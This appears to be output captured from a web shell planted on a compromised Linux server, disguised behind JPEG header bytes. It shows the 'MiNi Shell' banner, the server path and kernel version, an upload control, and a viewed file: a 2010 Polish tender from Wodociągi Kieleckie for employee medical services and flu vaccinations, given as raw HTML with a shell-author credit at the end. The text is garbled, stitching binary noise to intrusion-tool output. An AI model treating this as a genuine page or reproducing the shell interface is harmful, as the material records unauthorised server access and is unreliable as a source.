JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100309/65614-N-2010.html

<p class="kh_header"><b>Kielce: Świadczenia medyczne dla osób zatrudnionych w Spółce z o.o. Wodociągi Kieleckie.</b><br>
<b>Numer ogłoszenia: 65614 - 2010; data zamieszczenia: 09.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wodociągi Kieleckie Sp. z o.o. , ul. Krakowska 64, 25-701 Kielce, woj. świętokrzyskie, tel. 041 3653100, faks 041 3455220.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wod-kiel.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenia medyczne dla osób zatrudnionych w Spółce z o.o. Wodociągi Kieleckie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa  udzielania świadczeń zdrowotnych, pracownikom zatrudnionym w WODOCIĄGACH  KIELECKICH. Zakres usługi został podzielony na dwie części.

CZĘŚĆ Nr 1: świadczenia zdrowotne w zakresie:

- zgodnym z Kodeksem Pracy:

a) badania wstępne,
b)badania okresowe,
c) badania kontrolne, 
d) szczepienia ochronne pracowników na stanowiskach  pracy zagrożonych czynnikami 
  biologicznymi,
e) badania na nosicielstwo, związane z uaktualnieniem książeczek zdrowia dla celów 
  sanitarno - epidemiologicznych,
f) badania psychologiczne kierowców,
g) udział lekarza w pracach Zakładowej Komisji BHP.

- zgodnym z Układem Zbiorowym Pracy: 

h) badania mammograficzne wraz z  USG ( kobiety po 40 roku życia), 
i) USG  ( badanie piersi, kobiet poniżej 40 roku życia) ,
j) badanie prostaty wraz z analizą krwi  ( PSA ).

Ad. a) b) c) Badania wstępne, okresowe i kontrolne będą wykonywane na podstawie
Skierowania na badania profilaktyczne wystawianego przez Dział Spraw Pracowniczych Spółki w placówkach medycznych wskazanych przez Wykonawcę. 
Zakres analiz laboratoryjnych winien obejmować: 

a) badanie krwi w zakresie:	- morfologia ogólna,
- OB,
- poziom cukru,
- cholesterol całkowity,
- HDL,
- LDL,
- TG.
b) analiza ogólna moczu,
c) prześwietlenie płuc*).

*) Jeżeli w trakcie, wykonywania badań wskazanych w punktach a, b i c, pracownik zrezygnuje z prześwietlenia płuc, oferowaną ryczałtową kwotę za te badania należy pomniejszyć o cenę prześwietlenia (wartość  podana w formularzu ofertowym ). Rezygnacja ta winna być potwierdzona podpisem pracownika. 

Badanie okulistyczne osób ze wskazaniem praca przy monitorze ekranowym winno być udokumentowane zaświadczeniem o konieczności stosowania okularów korekcyjnych  oraz zleceniem na wykonanie okularów, w sytuacji kiedy przeprowadzone badania wykażą konieczność korekty wzroku.

Szczepienia ochronne pracowników na stanowiskach  pracy zagrożonych czynnikami 
biologicznymi, będą wykonywane w terminach zgodnych z indywidualnym kalendarzem szczepień, w placówce wskazanej przez Wykonawcę lub w siedzibie jednostek terenowych Spółki,  po uprzednim uzgodnieniu terminów przez zainteresowane strony.

 Badania na nosicielstwo, związane z uaktualnieniem książeczek zdrowia dla celów sanitarno - epidemiologicznych i  badania psychologiczne kierowców, będą wykonywane zgodnie z obowiązującymi przepisami w tym zakresie.

Udział lekarza w pracach Zakładowej Komisji BHP; obejmuje wyjazdy z komisją BHP na obiekty Spółki w celu przeprowadzenia przeglądów  pod względem bezpieczeństwa i higieny pracy, kontrolę wykonania zaleceń, udział w posiedzeniach komisji.

Badania mammograficzne wraz z  USG, wykonywane będą w roku 2010 w jednostce medycznej wskazanej przez Wykonawcę, w terminie uzgodnionym z Zamawiającym - orientacyjną ilość osób do wykonania przedmiotowego badania zawiera załącznik nr 2, Formularz cenowy.

Badanie prostaty wraz z analizą krwi  ( PSA ), wykonywane będą w roku 2010 w jednostce medycznej wskazanej przez Wykonawcę, w terminie uzgodnionym z Zamawiającym, orientacyjną ilość osób do wykonania przedmiotowego badania zawiera załącznik nr 2,  Formularz cenowy.



CZĘŚĆ  Nr 2:  Dostawa szczepionek przeciwko grypie sezonowej  wraz z wykonaniem szczepień ochronnych pracowników.

Wykonawca w zakresie CZĘŚCI  Nr 2 zobowiązany jest dostarczyć szczepionki  przeciw grypie w ilości wskazanej przez Zamawiającego. Przed wykonaniem zabiegu lekarz winien przeprowadzić badanie pracowników. Szczepienia ochronne przeciwko grypie sezonowej, będą wykonywane na przełomie III i IV kwartału w latach obowiązywania umowy, w siedzibie oraz  w jednostkach terenowych Zamawiającego; przewóz personelu medycznego i materiałów koniecznych do przeprowadzenia szczepień zostanie zabezpieczony przez Zamawiającego na jego koszt. Szczepienia przeciwko grypie należy wycenić kompleksowo w zł/ osobę, uwzględniając  koszty pracy personelu medycznego oraz koszt materiałów koniecznych do właściwego wykonania usługi.

Ogólne warunki świadczenia usługi.

Przedmiot zamówienia winien być realizowany zgodnie z ustawą z dnia 27 czerwca 1997r. O służbie  medycyny pracy ( tekst jednolity  Dz. U. 2004 nr 125 poz. 1317 z późniejszymi zmianami ) oraz  rozporządzeniem Ministra Zdrowi i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzenia badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy ( Dz. U. 1996 nr 69 poz. 332 z późniejszymi zmianami ). 

       Zamawiający wymaga, aby świadczenia w zakresie przedmiotu zamówienia realizowane były w placówce wskazanej przez  Wykonawcę w dni robocze w godzinach od 7:00 do 15:00. Dodatkowo, Wykonawca zobowiązany jest zapewnić, co najmniej dwa razy w tygodniu konsultacje medyczne, także w godzinach popołudniowych. Zamawiający zastrzega  sobie możliwość rejestracji telefonicznej.

Zamawiający dopuszcza zlecenie przez Wykonawcę badań takich jak: mammografia, USG i prostata,  Podwykonawcy  tj. placówce ochrony zdrowia która wykonuje powyższe badania specjalistyczne. 


- Placówka wykonująca badania mammograficzne i USG, zobowiązana jest do dostarczenia wyników badań, w zaklejonych kopertach z nazwiskiem osoby badanej do siedziby Zamawiającego.

- Laboratorium wykonujące badanie krwi ( PSA ), zobowiązane jest do przekazania wyników badań do placówki medycznej, wskazanej jako Wykonawca badań prostaty.

Zamawiający nie dopuszcza możliwości wykonywania świadczeń medycznych będących przedmiotem zamówienia poza terenem miasta Kielce -  powyższe nie dotyczy szczepień profilaktycznych i ochronnych, które mogą być wykonywane na terenie obiektów Spółki. 

Szacunkową ilość świadczeń medycznych, za okres obowiązywania umowy ( 24 miesiące od dnia jej podpisania )  zawiera Formularz cenowy - Załącznik nr 2.
	

Spółka z o.o. Wodociągi Kieleckie zastrzega sobie prawo do zmniejszenia ilości zleconych świadczeń, co nie będzie odstąpieniem od warunków umowy. Rzeczywista ilość świadczeń wynikać będzie z bieżących potrzeb Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0, 85.14.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Udział w postępowaniu nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, wykonywał lub wykonuje co najmniej 2 usługi w zakresie świadczeń medycznych odpowiadających swoim rodzajem przedmiotowi zamówienia, które obejmowały obsługę firm, o liczbie zatrudnionych na etacie pracowników nie mniejszej niż 200 osób.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca przestawi wykaz placówek medycznych na terenie miasta Kielce w których będzie realizowany przedmiot zamówienia z podaniem ich nazw i adresów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca przedstawi imienny wykaz lekarzy wyznaczonych do realizacji zamówienia, posiadających co najmniej niżej  wymienione specjalizacje:
-  lekarz medycyny pracy,
-  neurolog,
-  okulista.
Wykonawca powinien dysponować przynajmniej jednym lekarzem w zakresie każdej z wymienionych specjalizacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca złoży kopię, potwierdzoną za zgodność z oryginałem opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość nie mniejszą niż wartość złożonej oferty. Polisa musi być opłacona przez cały okres obowiązywania umowy, w przypadku wygaśnięcia  polisy Wykonawca będzie zobowiązany do jej odnowienia i poinformowania o powyższym Zamawiającego ( złożenie kopii nowej polisy potwierdzonej za zgodność z oryginałem )</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W trakcie realizacji usługi, Zamawiający przewiduje zmianę zapisów treści umowy w zakresie:

a) zmiany sposobu świadczenia usługi w przypadkach:

- zmian osobowych tj.  zmiany osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne,  legitymujące się uprawnieniami wymaganymi do realizacji świadczenia,

b) zmiany organizacji spełniania świadczenia usługi w przypadkach:
	
- zmiany miejsca - adresu placówki realizującej świadczenia medyczne,

- zmiany placówki wykonującej badania specjalistyczne ( mammografia, prostata ) na inną niż wskazana w dokumentach ofertowych. Placówka ta musi  gwarantować wykonanie przedmiotowych badań w zakresie zgodnym z zapisami w SIWZ, zgodnie obowiązującymi przepisami i sztuką  lekarską.

Zmiany opisane w punktach a) i b) nie będą skutkowały zmianą wartości umowy. 
    
 c) inne zmiany:
- zmiana obowiązującej stawki VAT,  jeżeli zmiana stawki podatku VAT będzie skutkować zwiększeniem kosztów realizacji umowy przez Wykonawcę, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez Wykonawcę, 

- rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy ( podane ilości osób są wielkościami przybliżonymi ), w tym przypadku wynagrodzenie Wykonawcy zostanie zapłacone za wykonane świadczenia medyczne.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wod-kiel.com.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wodociągi Kieleckie Sp. z o.o. 25-701 Kielce ul. Krakowska 64, Biuro Obsługi Klienta..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2010 godzina 08:45, miejsce: Biuro Obsługi Klienta, 25-701 Kielce ul. Krakowska 64..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa szczepionek przeciwko grypie sezonowej  wraz z wykonaniem szczepień ochronnych pracowników..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca w zakresie CZĘŚCI  Nr 2 zobowiązany jest dostarczyć szczepionki  przeciw grypie w ilości wskazanej przez Zamawiającego. Przed wykonaniem zabiegu lekarz winien przeprowadzić badanie pracowników. Szczepienia ochronne przeciwko grypie sezonowej, będą wykonywane na przełomie III i IV kwartału w latach obowiązywania umowy, w siedzibie oraz  w jednostkach terenowych Zamawiającego; przewóz personelu medycznego i materiałów koniecznych do przeprowadzenia szczepień zostanie zabezpieczony przez Zamawiającego na jego koszt. Szczepienia przeciwko grypie należy wycenić kompleksowo w zł/ osobę, uwzględniając  koszty pracy personelu medycznego oraz koszt materiałów koniecznych do właściwego wykonania usługi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0, 85.14.70.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com